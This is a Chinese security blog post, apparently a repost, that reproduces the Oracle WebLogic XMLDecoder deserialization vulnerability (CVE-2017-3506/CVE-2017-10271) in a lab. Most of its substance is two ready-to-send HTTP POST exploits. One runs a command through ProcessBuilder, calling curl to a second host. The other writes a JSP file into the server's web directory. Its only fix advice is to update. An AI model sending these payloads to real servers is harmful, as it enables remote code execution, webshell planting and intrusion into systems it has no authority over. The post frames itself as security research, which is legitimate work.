Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

2024年4月26日10:19:32评论63 views字数 2290阅读7分38秒阅读模式

声明：请勿将文章内的相关技术用于非法目的，如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。

0X01 简介

Oracle WebLogic Server 是一个统一的可扩展平台，专用于开发、部署和运行 Java 应用等适用于本地环境和云环境的企业应用。它提供了一种强健、成熟和可扩展的Java Enterprise Edition (EE) 和 Jakarta EE 实施方式。

CVE-2017-10271与CVE-2017-3506利用方式一样，在CVE-2017-10271 POC内限制了object的使用。

官网：

https://www.oracle.com/

漏洞编号：

CVE-2017-3506

CVE-2017-10271

影响范围：

Oracle WebLogic Server 10.3.6.0

Oracle WebLogic Server 12.1.3.0

Oracle WebLogic Server 12.2.1.0

Oracle WebLogic Server 12.2.1.1

Oracle WebLogic Server 12.2.1.2

复现环境：

Oracle WebLogic Server 10.3.6.0

0X02 漏洞复现

访问目录如果存在，可能存在漏洞。

http://192.168.245.134:7001/wls-wsat/CoordinatorPortTypehttp://192.168.245.134:7001/wls-wsat/CoordinatorPortType11

Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

POC（命令执行）：

POST /wls-wsat/CoordinatorPortType HTTP/1.1Host: 192.168.245.134:7001Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: text/xmlContent-Length: 559<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java version="1.4.0" class="java.beans.XMLDecoder"><void class="java.lang.ProcessBuilder"><array class="java.lang.String" length="2"><void index="0"><string>curl</string></void><void index="1"><string>http://192.168.245.129:8888/123</string></void></array><void method="start"/></void></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>

POC（文件上传）：

POST /wls-wsat/CoordinatorPortType HTTP/1.1Host: 192.168.245.134:7001Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: text/xmlContent-Length: 638<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">    <soapenv:Header>    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">    <java><java version="1.4.0" class="java.beans.XMLDecoder">    <object class="java.io.PrintWriter">    <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string>    <void method="println"><string>    <![CDATA[<% out.print("test"); %>    ]]>    </string>    </void>    <void method="close"/>    </object></java></java>    </work:WorkContext>    </soapenv:Header>    <soapenv:Body/></soapenv:Envelope>

0X03 修复建议

更新至最新版！

0X04

原文始发于微信公众号（皓月的笔记本）：Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

Weblogic 反序列化漏洞（CVE-2017-3506/CVE-2017-10271）

将恶意代码注入 PDF 文件并创建 PDF Dropper

文件上传学习

利用虚假 GIF 进行多阶段反向代理卡盗刷攻击

挖洞日记 | 某高校旁站到统一认证, 怒刷30+rank

LetMeowIn - 凭证转储程序分析

CVE-2025-24054 遭受主动攻击 - 文件下载时窃取 NTLM 凭证

【渗透测试】doubletrouble: 1靶场渗透测试

Telnet 渗透测试（端口 23）

分享常见的逻辑漏洞挖掘方法（第二部分）

同步漏洞行动：朝鲜Lazarus APT组织针对韩国供应链发起攻击

发表评论

在线咨询

微信